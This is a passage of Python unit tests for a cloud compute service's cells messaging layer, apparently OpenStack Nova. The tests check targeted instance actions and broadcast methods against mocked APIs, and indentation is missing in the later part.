    self.mox.StubOutWithMock(self.tgt_msg_runner,
                             'instance_destroy_at_top')
    instance.refresh().AndRaise(
            exception.InstanceNotFound(instance_id=instance.uuid))
    self.tgt_msg_runner.instance_destroy_at_top(self.ctxt,
                                                mox.IsA(objects.Instance))
    self.mox.ReplayAll()
    self.assertRaises(exception.InstanceNotFound,
                      self.tgt_methods_cls._call_compute_api_with_obj,
                      self.ctxt, instance, 'snapshot', 'name')
def _instance_update_helper(self, admin_state_reset):
    """Drive instance_update_from_api and verify which changed fields
    survive until save().

    :param admin_state_reset: when True, vm_state/task_state changes are
        kept on the object (admin override); when False they are
        stripped before save() and passed as expected_* states instead.
    """
    class FakeMessage(object):
        pass

    message = FakeMessage()
    message.ctxt = self.ctxt

    instance = objects.Instance()
    instance.cell_name = self.tgt_cell_name
    instance.obj_reset_changes()
    instance.task_state = 'meow'
    instance.vm_state = 'wuff'
    instance.user_data = 'foo'
    instance.metadata = {'meta': 'data'}
    instance.system_metadata = {'system': 'metadata'}
    # Sanity-check the dirty-field set before the call under test.
    self.assertEqual(set(['user_data', 'vm_state', 'task_state',
                          'metadata', 'system_metadata']),
                     instance.obj_what_changed())

    self.mox.StubOutWithMock(instance, 'save')

    def _check_object(*args, **kwargs):
        # task_state and vm_state changes should have been cleared
        # before calling save()
        if admin_state_reset:
            self.assertEqual(
                    set(['user_data', 'vm_state', 'task_state']),
                    instance.obj_what_changed())
        else:
            self.assertEqual(set(['user_data']),
                             instance.obj_what_changed())

    instance.save(expected_task_state='exp_task',
                  expected_vm_state='exp_vm').WithSideEffects(
                          _check_object)
    self.mox.ReplayAll()

    self.tgt_methods_cls.instance_update_from_api(
            message,
            instance,
            expected_vm_state='exp_vm',
            expected_task_state='exp_task',
            admin_state_reset=admin_state_reset)
def test_instance_update_from_api(self):
    """API-initiated update without forcing admin vm/task state."""
    self._instance_update_helper(admin_state_reset=False)
def test_instance_update_from_api_admin_state_reset(self):
    """API-initiated update that forces vm/task state (admin reset)."""
    self._instance_update_helper(admin_state_reset=True)
def test_instance_update_from_api_calls_skip_cells_sync(self):
    """In a compute cell, instance_update_from_api must wrap save() in
    skip_cells_sync() so the change is not echoed back up the tree --
    even when save() fails.
    """
    self.flags(enable=True, cell_type='compute', group='cells')
    instance = fake_instance.fake_instance_obj(self.ctxt)
    instance.cell_name = self.tgt_cell_name
    instance.task_state = 'meow'
    instance.vm_state = 'wuff'
    instance.user_data = 'foo'
    message = ''

    @mock.patch.object(instance, 'save', side_effect=test.TestingException)
    @mock.patch.object(instance, 'skip_cells_sync')
    def _ensure_skip_cells_sync_called(mock_sync, mock_save):
        self.assertRaises(test.TestingException,
                          self.tgt_methods_cls.instance_update_from_api,
                          message, instance, expected_vm_state='exp_vm',
                          expected_task_state='exp_task',
                          admin_state_reset=False)
        # skip_cells_sync() (a context manager) must have been entered.
        mock_sync.assert_has_calls([mock.call()])

    _ensure_skip_cells_sync_called()
    # The cell name must be restored after the update attempt.
    self.assertEqual(self.tgt_cell_name, instance.cell_name)
@mock.patch.object(db, 'instance_update_and_get_original')
def test_instance_update_from_api_skips_cell_sync(self, mock_db_update):
    """With cells sync skipped, saving in a compute cell must not fire
    instance_update_at_top back toward the API cell.
    """
    self.flags(enable=True, cell_type='compute', group='cells')
    instance = fake_instance.fake_instance_obj(self.ctxt)
    instance.cell_name = self.tgt_cell_name
    instance.task_state = 'meow'
    instance.vm_state = 'wuff'
    instance.user_data = 'foo'
    message = ''
    inst_ref = dict(objects_base.obj_to_primitive(instance))
    # save() runs the real object code path here, so stub out the DB
    # layer it ultimately calls.
    mock_db_update.return_value = (inst_ref, inst_ref)
    with mock.patch.object(cells_rpcapi.CellsAPI,
                           'instance_update_at_top') as inst_upd_at_top:
        self.tgt_methods_cls.instance_update_from_api(message, instance,
                expected_vm_state='exp_vm', expected_task_state='exp_task',
                admin_state_reset=False)
        self.assertEqual(0, inst_upd_at_top.call_count)
def _test_instance_action_method(self, method, args, kwargs,
                                 expected_args, expected_kwargs,
                                 expect_result):
    """Generic driver for targeted instance-action message methods.

    :param method: logical action name ('start', 'stop', ...)
    :param args: positional args passed to the message method
    :param kwargs: keyword args passed to the message method
    :param expected_args: positional args the compute API should receive
    :param expected_kwargs: keyword args the compute API should receive
    :param expect_result: True when the message is a call and the compute
        API return value must come back as the result
    """
    class FakeMessage(object):
        pass

    message = FakeMessage()
    message.ctxt = self.ctxt
    message.need_response = expect_result

    meth_cls = self.tgt_methods_cls
    self.mox.StubOutWithMock(meth_cls, '_call_compute_api_with_obj')

    # Some message methods map to a differently named compute API call.
    method_corrections = {
        'terminate': 'delete',
    }
    api_method = method_corrections.get(method, method)

    meth_cls._call_compute_api_with_obj(
            self.ctxt, 'fake-instance', api_method,
            *expected_args, **expected_kwargs).AndReturn('meow')
    self.mox.ReplayAll()

    # Most message methods are named '<action>_instance'; these are the
    # exceptions that keep their bare name.
    method_translations = {'revert_resize': 'revert_resize',
                           'confirm_resize': 'confirm_resize',
                           'reset_network': 'reset_network',
                           'inject_network_info': 'inject_network_info',
                           'set_admin_password': 'set_admin_password',
                           }
    tgt_method = method_translations.get(method,
                                         '%s_instance' % method)

    result = getattr(meth_cls, tgt_method)(
            message, 'fake-instance', *args, **kwargs)
    if expect_result:
        self.assertEqual('meow', result)
def test_start_instance(self):
    """start maps to start_instance with no extra arguments."""
    self._test_instance_action_method(
        'start', args=(), kwargs={},
        expected_args=(), expected_kwargs={}, expect_result=False)
def test_stop_instance_cast(self):
    """stop as a cast adds do_cast=True and clean_shutdown=True."""
    self._test_instance_action_method(
        'stop', args=(), kwargs={}, expected_args=(),
        expected_kwargs={'do_cast': True, 'clean_shutdown': True},
        expect_result=False)
def test_stop_instance_call(self):
    """stop as a call adds do_cast=False and returns a result."""
    self._test_instance_action_method(
        'stop', args=(), kwargs={}, expected_args=(),
        expected_kwargs={'do_cast': False, 'clean_shutdown': True},
        expect_result=True)
def test_reboot_instance(self):
    """reboot passes reboot_type through to the compute API unchanged."""
    reboot_kwargs = {'reboot_type': 'HARD'}
    self._test_instance_action_method(
        'reboot', args=(), kwargs=reboot_kwargs,
        expected_args=(), expected_kwargs=reboot_kwargs,
        expect_result=False)
def test_suspend_instance(self):
    """suspend maps to suspend_instance with no extra arguments."""
    self._test_instance_action_method(
        'suspend', args=(), kwargs={},
        expected_args=(), expected_kwargs={}, expect_result=False)
def test_resume_instance(self):
    """resume maps to resume_instance with no extra arguments."""
    self._test_instance_action_method(
        'resume', args=(), kwargs={},
        expected_args=(), expected_kwargs={}, expect_result=False)
def test_get_host_uptime(self):
    """Targeted get_host_uptime returns the host API's uptime string."""
    host_name = "fake-host"
    host_uptime = (" 08:32:11 up 93 days, 18:25, 12 users,  load average:"
                   " 0.20, 0.12, 0.14")
    self.mox.StubOutWithMock(self.tgt_host_api, 'get_host_uptime')
    self.tgt_host_api.get_host_uptime(self.ctxt, host_name).\
        AndReturn(host_uptime)
    self.mox.ReplayAll()
    response = self.src_msg_runner.get_host_uptime(self.ctxt,
                                                   self.tgt_cell_name,
                                                   host_name)
    expected_host_uptime = response.value_or_raise()
    self.assertEqual(host_uptime, expected_host_uptime)
def test_terminate_instance(self):
    """terminate is corrected to the compute API's 'delete' method."""
    self._test_instance_action_method(
        'terminate', args=(), kwargs={},
        expected_args=(), expected_kwargs={}, expect_result=False)
def test_soft_delete_instance(self):
    """soft_delete maps to soft_delete_instance with no extra args."""
    self._test_instance_action_method(
        'soft_delete', args=(), kwargs={},
        expected_args=(), expected_kwargs={}, expect_result=False)
def test_pause_instance(self):
    """pause maps to pause_instance with no extra arguments."""
    self._test_instance_action_method(
        'pause', args=(), kwargs={},
        expected_args=(), expected_kwargs={}, expect_result=False)
def test_unpause_instance(self):
    """unpause maps to unpause_instance with no extra arguments."""
    self._test_instance_action_method(
        'unpause', args=(), kwargs={},
        expected_args=(), expected_kwargs={}, expect_result=False)
def _test_resize_instance(self, clean_shutdown=True):
    """resize_instance flattens the flavor dict to flavor_id and merges
    extra_instance_updates into the compute API kwargs.

    :param clean_shutdown: forwarded through to the compute API.
    """
    kwargs = dict(flavor=dict(id=42, flavorid='orangemocchafrappuccino'),
                  extra_instance_updates=dict(cow='moo'),
                  clean_shutdown=clean_shutdown)
    expected_kwargs = dict(flavor_id='orangemocchafrappuccino', cow='moo',
                           clean_shutdown=clean_shutdown)
    self._test_instance_action_method('resize', (), kwargs,
                                      (), expected_kwargs,
                                      False)
def test_resize_instance(self):
    """Resize with the (default) clean shutdown."""
    self._test_resize_instance(clean_shutdown=True)
def test_resize_instance_forced_shutdown(self):
    """Resize with clean_shutdown disabled (forced power-off)."""
    self._test_resize_instance(clean_shutdown=False)
def test_live_migrate_instance(self):
    """live_migrate unpacks its kwargs into positional compute API
    arguments (block_migration, disk_over_commit, host_name)."""
    kwargs = dict(block_migration='fake-block-mig',
                  disk_over_commit='fake-commit',
                  host_name='fake-host')
    expected_args = ('fake-block-mig', 'fake-commit', 'fake-host')
    self._test_instance_action_method('live_migrate', (), kwargs,
                                      expected_args, {}, False)
def test_revert_resize(self):
    """revert_resize keeps its bare name (no '_instance' suffix)."""
    self._test_instance_action_method(
        'revert_resize', args=(), kwargs={},
        expected_args=(), expected_kwargs={}, expect_result=False)
def test_confirm_resize(self):
    """confirm_resize keeps its bare name (no '_instance' suffix)."""
    self._test_instance_action_method(
        'confirm_resize', args=(), kwargs={},
        expected_args=(), expected_kwargs={}, expect_result=False)
def test_reset_network(self):
    """reset_network keeps its bare name (no '_instance' suffix)."""
    self._test_instance_action_method(
        'reset_network', args=(), kwargs={},
        expected_args=(), expected_kwargs={}, expect_result=False)
def test_inject_network_info(self):
    """inject_network_info keeps its bare name (no '_instance' suffix)."""
    self._test_instance_action_method(
        'inject_network_info', args=(), kwargs={},
        expected_args=(), expected_kwargs={}, expect_result=False)
def test_snapshot_instance(self):
    """snapshot_instance sets IMAGE_SNAPSHOT_PENDING before saving,
    then casts to the compute RPC API.
    """
    inst = objects.Instance()
    meth_cls = self.tgt_methods_cls

    self.mox.StubOutWithMock(inst, 'refresh')
    self.mox.StubOutWithMock(inst, 'save')
    self.mox.StubOutWithMock(meth_cls.compute_rpcapi, 'snapshot_instance')

    def check_state(expected_task_state=None):
        # The task state must already be set when save() happens.
        self.assertEqual(task_states.IMAGE_SNAPSHOT_PENDING,
                         inst.task_state)

    inst.refresh()
    inst.save(expected_task_state=[None]).WithSideEffects(check_state)

    meth_cls.compute_rpcapi.snapshot_instance(self.ctxt,
                                              inst, 'image-id')

    self.mox.ReplayAll()

    class FakeMessage(object):
        pass

    message = FakeMessage()
    message.ctxt = self.ctxt
    message.need_response = False

    meth_cls.snapshot_instance(message, inst, image_id='image-id')
def test_backup_instance(self):
    """backup_instance sets IMAGE_BACKUP before saving, then casts to
    the compute RPC API with image id, backup type and rotation.
    """
    inst = objects.Instance()
    meth_cls = self.tgt_methods_cls

    self.mox.StubOutWithMock(inst, 'refresh')
    self.mox.StubOutWithMock(inst, 'save')
    self.mox.StubOutWithMock(meth_cls.compute_rpcapi, 'backup_instance')

    def check_state(expected_task_state=None):
        # The task state must already be set when save() happens.
        self.assertEqual(task_states.IMAGE_BACKUP, inst.task_state)

    inst.refresh()
    inst.save(expected_task_state=[None]).WithSideEffects(check_state)

    meth_cls.compute_rpcapi.backup_instance(self.ctxt,
                                            inst,
                                            'image-id',
                                            'backup-type',
                                            'rotation')

    self.mox.ReplayAll()

    class FakeMessage(object):
        pass

    message = FakeMessage()
    message.ctxt = self.ctxt
    message.need_response = False

    meth_cls.backup_instance(message, inst,
                             image_id='image-id',
                             backup_type='backup-type',
                             rotation='rotation')
def test_set_admin_password(self):
    """set_admin_password forwards the password positionally."""
    password_args = ['fake-password']
    self._test_instance_action_method(
        'set_admin_password', args=password_args, kwargs={},
        expected_args=password_args, expected_kwargs={},
        expect_result=False)
class CellsBroadcastMethodsTestCase(test.NoDBTestCase):
"""Test case for _BroadcastMessageMethods class. Most of these
tests actually test the full path from the MessageRunner through
to the functionality of the message method. Hits 2 birds with 1
stone, even though it's a little more than a unit test.
"""
def setUp(self):
super(CellsBroadcastMethodsTestCase, self).setUp()
fakes.init(self)
self.ctxt = context.RequestContext('fake', 'fake')
self._setup_attrs()
def _setup_attrs(self, up=True):
mid_cell = 'child-cell2'
if up:
src_cell = 'grandchild-cell1'
tgt_cell = 'api-cell'
else:
src_cell = 'api-cell'
tgt_cell = 'grandchild-cell1'
self.src_msg_runner = fakes.get_message_runner(src_cell)
methods_cls = self.src_msg_runner.methods_by_type['broadcast']
self.src_methods_cls = methods_cls
self.src_db_inst = methods_cls.db
self.src_compute_api = methods_cls.compute_api
self.src_ca_rpcapi = methods_cls.consoleauth_rpcapi
if not up:
# fudge things so we only have 1 child to broadcast to
state_manager = self.src_msg_runner.state_manager
for cell in state_manager.get_child_cells():
if cell.name != 'child-cell2':
del state_manager.child_cells[cell.name]
self.mid_msg_runner = fakes.get_message_runner(mid_cell)
methods_cls = self.mid_msg_runner.methods_by_type['broadcast']
self.mid_methods_cls = methods_cls
self.mid_db_inst = methods_cls.db
self.mid_compute_api = methods_cls.compute_api
self.mid_ca_rpcapi = methods_cls.consoleauth_rpcapi
self.tgt_msg_runner = fakes.get_message_runner(tgt_cell)
methods_cls = self.tgt_msg_runner.methods_by_type['broadcast']
self.tgt_methods_cls = methods_cls
self.tgt_db_inst = methods_cls.db
self.tgt_compute_api = methods_cls.compute_api
self.tgt_ca_rpcapi = methods_cls.consoleauth_rpcapi
def test_at_the_top(self):
self.assertTrue(self.tgt_methods_cls._at_the_top())
self.assertFalse(self.mid_methods_cls._at_the_top())
self.assertFalse(self.src_methods_cls._at_the_top())
def test_apply_expected_states_building(self):
instance_info = objects.Instance(vm_state=vm_states.BUILDING)
expected = instance_info.obj_clone()
expected.expected_vm_state = [vm_states.BUILDING, None]
expected_vm_state = self.src_methods_cls._get_expected_vm_state(
instance_info)
self.assertEqual(expected.expected_vm_state, expected_vm_state)
def test_apply_expected_states_resize_finish(self):
instance_info = objects.Instance(task_state=task_states.RESIZE_FINISH)
exp_states = [task_states.RESIZE_FINISH,
task_states.RESIZE_MIGRATED,
task_states.RESIZE_MIGRATING,
task_states.RESIZE_PREP]
expected = instance_info.obj_clone()
expected.expected_task_state = exp_states
expected_task_state = self.src_methods_cls._get_expected_task_state(
instance_info)
self.assertEqual(expected.expected_task_state, expected_task_state)
def _test_instance_update_at_top(self, exists=True):
fake_uuid = fake_server_actions.FAKE_UUID
fake_info_cache = objects.InstanceInfoCache(instance_uuid='fake-uuid')
fake_sys_metadata = {'key1': 'value1',
'key2': 'value2'}
fake_attrs = {'uuid': fake_uuid,
'cell_name': 'fake',
'info_cache': fake_info_cache,
'system_metadata': fake_sys_metadata}
fake_instance = objects.Instance(**fake_attrs)
expected_cell_name = 'api-cell!child-cell2!grandchild-cell1'
def fake_save(instance):
self.assertEqual(fake_uuid, instance.uuid)
self.assertEqual(expected_cell_name, instance.cell_name)
self.assertEqual(fake_info_cache, instance.info_cache)
self.assertEqual(fake_sys_metadata, instance.system_metadata)
@mock.patch.object(objects.Instance, 'save')
@mock.patch.object(objects.Instance, 'create')
def do_test(mock_create, mock_save):
if exists:
mock_save.side_effect = fake_save
else:
error = exception.InstanceNotFound(instance_id='fake_uuid')
mock_save.side_effect = error
self.src_msg_runner.instance_update_at_top(self.ctxt,
fake_instance)
if exists:
mock_save.assert_called_once_with(expected_vm_state=None,
expected_task_state=None)
self.assertFalse(mock_create.called)
else:
mock_save.assert_called_once_with(expected_vm_state=None,
expected_task_state=None)
mock_create.assert_called_once_with()
do_test()
def test_instance_update_at_top(self):
self._test_instance_update_at_top()
def test_instance_update_at_top_does_not_already_exist(self):
self._test_instance_update_at_top(exists=False)
def test_instance_update_at_top_with_building_state(self):
fake_uuid = fake_server_actions.FAKE_UUID
fake_info_cache = objects.InstanceInfoCache(instance_uuid='fake-uuid')
fake_sys_metadata = {'key1': 'value1',
'key2': 'value2'}
fake_attrs = {'uuid': fake_uuid,
'cell_name': 'fake',
'info_cache': fake_info_cache,
'system_metadata': fake_sys_metadata,
'vm_state': vm_states.BUILDING}
fake_instance = objects.Instance(**fake_attrs)
expected_cell_name = 'api-cell!child-cell2!grandchild-cell1'
expected_vm_state = [vm_states.BUILDING, None]
def fake_save(instance):
self.assertEqual(fake_uuid, instance.uuid)
self.assertEqual(expected_cell_name, instance.cell_name)
self.assertEqual(fake_info_cache, instance.info_cache)
self.assertEqual(fake_sys_metadata, instance.system_metadata)
with mock.patch.object(objects.Instance, 'save',
side_effect=fake_save) as mock_save:
self.src_msg_runner.instance_update_at_top(self.ctxt,
fake_instance)
# Check that save is called with the right expected states.
mock_save.assert_called_once_with(
expected_vm_state=expected_vm_state, expected_task_state=None)
def test_instance_destroy_at_top(self):
fake_instance = objects.Instance(uuid='fake_uuid')
with mock.patch.object(objects.Instance, 'destroy') as mock_destroy:
self.src_msg_runner.instance_destroy_at_top(self.ctxt,
fake_instance)
mock_destroy.assert_called_once_with()
def test_instance_destroy_at_top_incomplete_instance_obj(self):
fake_instance = objects.Instance(uuid='fake_uuid')
with mock.patch.object(objects.Instance, 'get_by_uuid') as mock_get:
self.src_msg_runner.instance_destroy_at_top(self.ctxt,
fake_instance)
mock_get.assert_called_once_with(self.ctxt, fake_instance.uuid)
def test_instance_hard_delete_everywhere(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
instance = {'uuid': 'meow'}
# Should not be called in src (API cell)
self.mox.StubOutWithMock(self.src_compute_api, 'delete')
self.mox.StubOutWithMock(self.mid_compute_api, 'delete')
self.mox.StubOutWithMock(self.tgt_compute_api, 'delete')
self.mid_compute_api.delete(self.ctxt, instance)
self.tgt_compute_api.delete(self.ctxt, instance)
self.mox.ReplayAll()
self.src_msg_runner.instance_delete_everywhere(self.ctxt,
instance, 'hard')
def test_instance_soft_delete_everywhere(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
instance = {'uuid': 'meow'}
# Should not be called in src (API cell)
self.mox.StubOutWithMock(self.src_compute_api, 'soft_delete')
self.mox.StubOutWithMock(self.mid_compute_api, 'soft_delete')
self.mox.StubOutWithMock(self.tgt_compute_api, 'soft_delete')
self.mid_compute_api.soft_delete(self.ctxt, instance)
self.tgt_compute_api.soft_delete(self.ctxt, instance)
self.mox.ReplayAll()
self.src_msg_runner.instance_delete_everywhere(self.ctxt,
instance, 'soft')
def test_instance_fault_create_at_top(self):
fake_instance_fault = {'id': 1,
'message': 'fake-message',
'details': 'fake-details'}
if_mock = mock.Mock(spec_set=objects.InstanceFault)
def _check_create():
self.assertEqual('fake-message', if_mock.message)
self.assertEqual('fake-details', if_mock.details)
# Should not be set
self.assertNotEqual(1, if_mock.id)
if_mock.create.side_effect = _check_create
with mock.patch.object(objects, 'InstanceFault') as if_obj_mock:
if_obj_mock.return_value = if_mock
self.src_msg_runner.instance_fault_create_at_top(
self.ctxt, fake_instance_fault)
if_obj_mock.assert_called_once_with(context=self.ctxt)
if_mock.create.assert_called_once_with()
def test_bw_usage_update_at_top(self):
fake_bw_update_info = {'uuid': 'fake_uuid',
'mac': 'fake_mac',
'start_period': 'fake_start_period',
'bw_in': 'fake_bw_in',
'bw_out': 'fake_bw_out',
'last_ctr_in': 'fake_last_ctr_in',
'last_ctr_out': 'fake_last_ctr_out',
'last_refreshed': 'fake_last_refreshed'}
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst, 'bw_usage_update')
self.mox.StubOutWithMock(self.mid_db_inst, 'bw_usage_update')
self.mox.StubOutWithMock(self.tgt_db_inst, 'bw_usage_update')
self.tgt_db_inst.bw_usage_update(self.ctxt, **fake_bw_update_info)
self.mox.ReplayAll()
self.src_msg_runner.bw_usage_update_at_top(self.ctxt,
fake_bw_update_info)
def test_sync_instances(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
project_id = 'fake_project_id'
updated_since_raw = 'fake_updated_since_raw'
updated_since_parsed = 'fake_updated_since_parsed'
deleted = 'fake_deleted'
instance1 = objects.Instance(uuid='fake_uuid1', deleted=False)
instance2 = objects.Instance(uuid='fake_uuid2', deleted=True)
fake_instances = [instance1, instance2]
self.mox.StubOutWithMock(self.tgt_msg_runner,
'instance_update_at_top')
self.mox.StubOutWithMock(self.tgt_msg_runner,
'instance_destroy_at_top')
self.mox.StubOutWithMock(timeutils, 'parse_isotime')
self.mox.StubOutWithMock(cells_utils, 'get_instances_to_sync')
# Middle cell.
timeutils.parse_isotime(updated_since_raw).AndReturn(
updated_since_parsed)
cells_utils.get_instances_to_sync(self.ctxt,
updated_since=updated_since_parsed,
project_id=project_id,
deleted=deleted).AndReturn([])
# Bottom/Target cell
timeutils.parse_isotime(updated_since_raw).AndReturn(
updated_since_parsed)
cells_utils.get_instances_to_sync(self.ctxt,
updated_since=updated_since_parsed,
project_id=project_id,
deleted=deleted).AndReturn(fake_instances)
self.tgt_msg_runner.instance_update_at_top(self.ctxt, instance1)
self.tgt_msg_runner.instance_destroy_at_top(self.ctxt, instance2)
self.mox.ReplayAll()
self.src_msg_runner.sync_instances(self.ctxt,
project_id, updated_since_raw, deleted)
def test_service_get_all_with_disabled(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
ctxt = self.ctxt.elevated()
self.mox.StubOutWithMock(objects.ServiceList, 'get_all')
# Calls are made from grandchild-cell to api-cell
objects.ServiceList.get_all(
mox.IgnoreArg(), disabled=None).AndReturn([4, 5])
objects.ServiceList.get_all(
mox.IgnoreArg(), disabled=None).AndReturn([3])
objects.ServiceList.get_all(
mox.IgnoreArg(), disabled=None).AndReturn([1, 2])
self.mox.ReplayAll()
responses = self.src_msg_runner.service_get_all(ctxt,
filters={})
response_values = [(resp.cell_name, resp.value_or_raise())
for resp in responses]
expected = [('api-cell!child-cell2!grandchild-cell1', [4, 5]),
('api-cell!child-cell2', [3]),
('api-cell', [1, 2])]
self.assertEqual(expected, response_values)
def test_service_get_all_without_disabled(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
disabled = False
filters = {'disabled': disabled}
ctxt = self.ctxt.elevated()
self.mox.StubOutWithMock(objects.ServiceList, 'get_all')
# Calls are made from grandchild-cell to api-cell
objects.ServiceList.get_all(
mox.IgnoreArg(), disabled=disabled).AndReturn([4, 5])
objects.ServiceList.get_all(
mox.IgnoreArg(), disabled=disabled).AndReturn([3])
objects.ServiceList.get_all(
mox.IgnoreArg(), disabled=disabled).AndReturn([1, 2])
self.mox.ReplayAll()
responses = self.src_msg_runner.service_get_all(ctxt,
filters=filters)
response_values = [(resp.cell_name, resp.value_or_raise())
for resp in responses]
expected = [('api-cell!child-cell2!grandchild-cell1', [4, 5]),
('api-cell!child-cell2', [3]),
('api-cell', [1, 2])]
self.assertEqual(expected, response_values)
def test_task_log_get_all_broadcast(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
task_name = 'fake_task_name'
begin = 'fake_begin'
end = 'fake_end'
host = 'fake_host'
state = 'fake_state'
ctxt = self.ctxt.elevated()
self.mox.StubOutWithMock(self.src_db_inst, 'task_log_get_all')
self.mox.StubOutWithMock(self.mid_db_inst, 'task_log_get_all')
self.mox.StubOutWithMock(self.tgt_db_inst, 'task_log_get_all')
self.src_db_inst.task_log_get_all(ctxt, task_name,
begin, end, host=host, state=state).AndReturn([1, 2])
self.mid_db_inst.task_log_get_all(ctxt, task_name,
begin, end, host=host, state=state).AndReturn([3])
self.tgt_db_inst.task_log_get_all(ctxt, task_name,
begin, end, host=host, state=state).AndReturn([4, 5])
self.mox.ReplayAll()
responses = self.src_msg_runner.task_log_get_all(ctxt, None,
task_name, begin, end, host=host, state=state)
response_values = [(resp.cell_name, resp.value_or_raise())
for resp in responses]
expected = [('api-cell!child-cell2!grandchild-cell1', [4, 5]),
('api-cell!child-cell2', [3]),
('api-cell', [1, 2])]
self.assertEqual(expected, response_values)
def test_compute_node_get_all(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
ctxt = self.ctxt.elevated()
self.mox.StubOutWithMock(objects.ComputeNodeList, 'get_all')
# Calls are made from grandchild-cell to api-cell
objects.ComputeNodeList.get_all(mox.IgnoreArg()).AndReturn([4, 5])
objects.ComputeNodeList.get_all(mox.IgnoreArg()).AndReturn([3])
objects.ComputeNodeList.get_all(mox.IgnoreArg()).AndReturn([1, 2])
self.mox.ReplayAll()
responses = self.src_msg_runner.compute_node_get_all(ctxt)
response_values = [(resp.cell_name, resp.value_or_raise())
for resp in responses]
expected = [('api-cell!child-cell2!grandchild-cell1', [4, 5]),
('api-cell!child-cell2', [3]),
('api-cell', [1, 2])]
self.assertEqual(expected, response_values)
def test_compute_node_get_all_with_hyp_match(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
hypervisor_match = 'meow'
ctxt = self.ctxt.elevated()
self.mox.StubOutWithMock(objects.ComputeNodeList, 'get_by_hypervisor')
# Calls are made from grandchild-cell to api-cell
objects.ComputeNodeList.get_by_hypervisor(
ctxt, hypervisor_match).AndReturn([4, 5])
objects.ComputeNodeList.get_by_hypervisor(
ctxt, hypervisor_match).AndReturn([3])
objects.ComputeNodeList.get_by_hypervisor(
ctxt, hypervisor_match).AndReturn([1, 2])
self.mox.ReplayAll()
responses = self.src_msg_runner.compute_node_get_all(ctxt,
hypervisor_match=hypervisor_match)
response_values = [(resp.cell_name, resp.value_or_raise())
for resp in responses]
expected = [('api-cell!child-cell2!grandchild-cell1', [4, 5]),
('api-cell!child-cell2', [3]),
('api-cell', [1, 2])]
self.assertEqual(expected, response_values)
def test_compute_node_stats(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
ctxt = self.ctxt.elevated()
self.mox.StubOutWithMock(self.src_db_inst,
'compute_node_statistics')
self.mox.StubOutWithMock(self.mid_db_inst,
'compute_node_statistics')
self.mox.StubOutWithMock(self.tgt_db_inst,
'compute_node_statistics')
self.src_db_inst.compute_node_statistics(ctxt).AndReturn([1, 2])
self.mid_db_inst.compute_node_statistics(ctxt).AndReturn([3])
self.tgt_db_inst.compute_node_statistics(ctxt).AndReturn([4, 5])
self.mox.ReplayAll()
responses = self.src_msg_runner.compute_node_stats(ctxt)
response_values = [(resp.cell_name, resp.value_or_raise())
for resp in responses]
expected = [('api-cell!child-cell2!grandchild-cell1', [4, 5]),
('api-cell!child-cell2', [3]),
('api-cell', [1, 2])]
self.assertEqual(expected, response_values)
def test_consoleauth_delete_tokens(self):
fake_uuid = 'fake-instance-uuid'
# To show these should not be called in src/mid-level cell
self.mox.StubOutWithMock(self.src_ca_rpcapi,
'delete_tokens_for_instance')
self.mox.StubOutWithMock(self.mid_ca_rpcapi,
'delete_tokens_for_instance')
self.mox.StubOutWithMock(self.tgt_ca_rpcapi,
'delete_tokens_for_instance')
self.tgt_ca_rpcapi.delete_tokens_for_instance(self.ctxt, fake_uuid)
self.mox.ReplayAll()
self.src_msg_runner.consoleauth_delete_tokens(self.ctxt, fake_uuid)
def test_bdm_update_or_create_with_none_create(self):
fake_bdm = {'id': 'fake_id',
'volume_id': 'fake_volume_id'}
expected_bdm = fake_bdm.copy()
expected_bdm.pop('id')
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst,
'block_device_mapping_update_or_create')
self.mox.StubOutWithMock(self.mid_db_inst,
'block_device_mapping_update_or_create')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_update_or_create')
self.tgt_db_inst.block_device_mapping_update_or_create(
self.ctxt, expected_bdm, legacy=False)
self.mox.ReplayAll()
self.src_msg_runner.bdm_update_or_create_at_top(self.ctxt,
fake_bdm,
create=None)
def test_bdm_update_or_create_with_true_create(self):
fake_bdm = {'id': 'fake_id',
'volume_id': 'fake_volume_id'}
expected_bdm = fake_bdm.copy()
expected_bdm.pop('id')
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst,
'block_device_mapping_create')
self.mox.StubOutWithMock(self.mid_db_inst,
'block_device_mapping_create')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_create')
self.tgt_db_inst.block_device_mapping_create(
self.ctxt, fake_bdm, legacy=False)
self.mox.ReplayAll()
self.src_msg_runner.bdm_update_or_create_at_top(self.ctxt,
fake_bdm,
create=True)
def test_bdm_update_or_create_with_false_create_vol_id(self):
fake_bdm = {'id': 'fake_id',
'instance_uuid': 'fake_instance_uuid',
'device_name': 'fake_device_name',
'volume_id': 'fake_volume_id'}
expected_bdm = fake_bdm.copy()
expected_bdm.pop('id')
fake_inst_bdms = [{'id': 1,
'volume_id': 'not-a-match',
'device_name': 'not-a-match'},
{'id': 2,
'volume_id': 'fake_volume_id',
'device_name': 'not-a-match'},
{'id': 3,
'volume_id': 'not-a-match',
'device_name': 'not-a-match'}]
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst,
'block_device_mapping_update')
self.mox.StubOutWithMock(self.mid_db_inst,
'block_device_mapping_update')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_get_all_by_instance')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_update')
self.tgt_db_inst.block_device_mapping_get_all_by_instance(
self.ctxt, 'fake_instance_uuid').AndReturn(
fake_inst_bdms)
# Should try to update ID 2.
self.tgt_db_inst.block_device_mapping_update(
self.ctxt, 2, expected_bdm, legacy=False)
self.mox.ReplayAll()
self.src_msg_runner.bdm_update_or_create_at_top(self.ctxt,
fake_bdm,
create=False)
def test_bdm_update_or_create_with_false_create_dev_name(self):
fake_bdm = {'id': 'fake_id',
'instance_uuid': 'fake_instance_uuid',
'device_name': 'fake_device_name',
'volume_id': 'fake_volume_id'}
